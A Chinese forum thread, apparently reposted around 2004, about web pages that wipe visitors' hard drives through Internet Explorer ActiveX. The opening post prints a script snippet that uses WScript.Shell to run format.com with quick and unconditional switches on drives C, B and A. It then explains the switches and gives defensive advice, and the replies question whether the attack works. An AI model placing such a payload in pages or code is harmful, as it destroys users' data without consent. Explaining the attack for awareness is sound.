如何格式化浏览者的硬盘[不可用于非法]

vj

转载www.Westrover.com

最近我的一位好友和我说他的机器在浏览一家网站的时候无故就被格了！
里面有好多重要文件都没有了，当时我也是起了一个好奇心，于是就去了
朋友的被害的网站，经过好久终于让我找到源程序了，内容如下！

＜OBJECT classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B id=wsh＞＜/OBJECT＞
＜SCRIPT＞
......
wsh.Run('start /m format.com c:/q /autotest /u');
wsh.Run('start /m format.com b:/q /autotest /u');
wsh.Run('start /m format.com a:/q /autotest /u');
......
＜/SCRIPT＞

看看吧！够狠的吧！我想大家都能看出这是什么意思，也就不用我多说了！

写这个文章是希望大家加强网络安全知识！不要向我的朋友一样那么“惨”！
解决方法：
1.将本机format这个命令改名！
2.不要浏览陌生的网站,特别是在聊天室不要看别人写的网址！
唉！还网络一片净土吧！

/m好像是手动的意思
/q是快速
/autotest是自动
/u是无条件
不知这么解释对吗

　　曾经在某个杂志上看到过一个介绍，说什么IE浏览器可以通过执行ActiveX而把硬盘格式化，而且记得
当时还公布了源
代码，只是当时公布的源代码是针对西班牙版的Windows，对中文版的Windows没有用，说不定那些代码现在
已经被一些高
手给改成了针对中文Windows的呢。
　　问问自己的朋友，他也是稀里糊涂地被格式化掉硬盘的，当时进入的网站也不记得了。没有办法，我只
好自己跑到国
内的一些网站去找类似的主题文章。皇天不负苦心人，终于找到了几个可以格式化硬盘的HTML文件。网站上
的版主出自好
心，提醒下载的网友：只能供自己研究，不可害人。
　　考虑到危险性，我先用记事本随便打开其中一个看看源代码，没有想到这个源文件竟给加了密，里面是
用JavaScript
写的脚本，加密的部分好像只是一些字符的定义，而真正的脚本内容也只是显示一些字符在屏幕上。因为自
己的机器是刚
装好的，没有什么特别重要的数据，所以就抱着"过把瘾就死"的念头，用IE浏览器打开了这个HTML文件。接
着，浏览器发
出一个警告："该页上的ActiveX控件与页上的其它部分进行交互可能不安全，是否允许进行交互？"。如果
你选择"是"，则
就会运行那些不安全控件。不过我试的这个HTML文件只是给大家开个玩笑，你打开它后，它说什么"你的C盘
已经被它强行
输入格式化，一旦重新启动就格式化了。请不要启动，立即保存有用的文件。"等诸如此类的话。我仔细检
查了一下
Windows启动程序里的内容，也没有什么变化，于是放心大胆地重启，果然是开的玩笑。
　　在下载的另外一个HTML文件中，看看源代码，不禁吓了一跳。程序仅有的不足30代代码中有24行都是调
用Windows里自
带的format.com命令，真是够狠的。除了A、B两个驱外，只要你能够分的区C-Z，都会被格式化。为了验证
其效果，又不想
我的硬盘被格式化，我把Windows里自带的format.com给改了名字，然后用IE打开该HTML文件，浏览器同样
发出一个警
告："该页上的某些软件(ActiveX控件)可能不安全。建议您不要运行。是否允许运行？"。当你选择"是"的
时候，会弹出几
十个DOS窗口，可能是因为它找不到format.com这个文件，找开的所有DOS窗口都是什么显示也没有。它不但
调用了
format.com，另外还加上了一些参数，如快速格式化等，再加上格式化时窗口就已经自动完成了硬盘格式化
的工作，等你
发现时也已经悔之晚矣。幸好我事先已经把硬盘里的format.com给改了名字，否则后果可想而知。
　　看来现在通过HTML文件来格式化中文版的Windows确实是可以做到的。以后大家上网可要小心点啦。不
过，大家也不必
怕被噎着而不吃饭，只要你按下面的方法做，照样能痛快淋漓地进行网上冲浪。
　　一、不要随便打开陌生人寄来的Email的附件，现在对于HTML文件，打开时如果出现所谓的"页面含有不
安全的
ActiveX"等信息时都该小心了，最好不要运行该ActiveX控件。
　　二、将Windows系统里比较危险的一些程序改名，比如format.com、deltree.exe等。我们在Windows下
真正用到这些
DOS命令的情况并不是很多，所以对直接调用DOS命令来恶意破坏系统的代码，改名不失为一种对付的好方
法。你可以改为
一些容易记的名字，如format.com改为format-1.com。
　　三、注意更新自己的系统，系统不一定是要最新的版本，但是其安全性方面的补丁就一定要注意，最好
能去下载并安
装上。我们常用的反病毒、反黑客程序要定期去更新。值得注意的是：对于我这次用到的格式化硬盘的HTML
文件，还没有
什么反病毒、反黑客程序能够做出反应（这也难怪，因为这个恶意代码并不属于病毒和黑客程序的范
畴）。
　　四、在网上遇到的一些非法网站，如果它要求你下载或者点击什么东西，要先看看说明，最好不要轻易
相信。以前报
纸上介绍的因为下载一个程序而造成拨号上网用户支付国际长途电话费就是一个惨痛的教训。像我的朋友那
样因为在网上
不听网页版主的劝告，硬要去试一试那些程序，结果糊里糊涂地硬盘被格，这个教训大家也要好好地汲
取。

谢谢分享。。。。。。。

leonardtoh

太可怕了。

为什么要这样？好玩meh？

windows xp 没可能会中～～

leonardtoh

为什么没可能？？？？？

碧咸

酱要在哪儿把我的format.com改去别的名呢 ?

leonardtoh 于 1-11-2004 12:40 AM  说 :
为什么没可能？？？？？

windows xp 是 NT SYSTEM 。。没有一个病毒可以直接改写 HDD file scetor..

jax_ong

碧咸坛主:酱要在哪儿把我的format.com改去别的名呢 ?

奇怪？？？

－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－
C:\WINDOWS\Desktop>format /?
Formats a disk for use with MS-DOS.

FORMAT drive: [/V[:label]] [/Q] [/F:size] [/B | /S] [/C]
FORMAT drive: [/V[:label]] [/Q] [/T:tracks /N:sectors] [/B | /S] [/C]
FORMAT drive: [/V[:label]] [/Q] [/1] [/4] [/B | /S] [/C]
FORMAT drive: [/Q] [/1] [/4] [/8] [/B | /S] [/C]

  /V[:label]  Specifies the volume label.
  /Q          Performs a quick format.
  /F:size     Specifies the size of the floppy disk to format (such
              as 160, 180, 320, 360, 720, 1.2, 1.44, 2.88).
  /B          Allocates space on the formatted disk for system files.
  /S          Copies system files to the formatted disk.
  /T:tracks   Specifies the number of tracks per disk side.
  /N:sectors  Specifies the number of sectors per track.
  /1          Formats a single side of a floppy disk.
  /4          Formats a 5.25-inch 360K floppy disk in a high-density drive.
  /8          Formats eight sectors per track.
  /C          Tests clusters that are currently marked "bad."

－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－

做么我的没有 /m  和 /u  的？？？
你说的是什么版本的windows ？？
什么版本的format.com ？？？